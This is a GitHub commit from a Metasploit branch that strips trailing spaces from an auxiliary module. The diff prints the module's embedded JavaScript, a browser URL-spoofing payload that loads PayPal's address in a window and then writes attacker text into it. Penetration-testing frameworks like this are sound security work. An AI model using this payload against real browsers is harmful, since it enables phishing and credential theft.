Spaces at EOL

GSoC/Meterpreter_Web_Console
Dhiraj Mishra 2018-06-09 15:58:11 +05:30 committed by GitHub
parent d3a18b2ce9
commit 51823b1d3d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -43,10 +43,10 @@ class MetasploitModule < Msf::Auxiliary
def setup
@html = <<-JS
<script type="text/javascript">
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win=window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
</script>
JS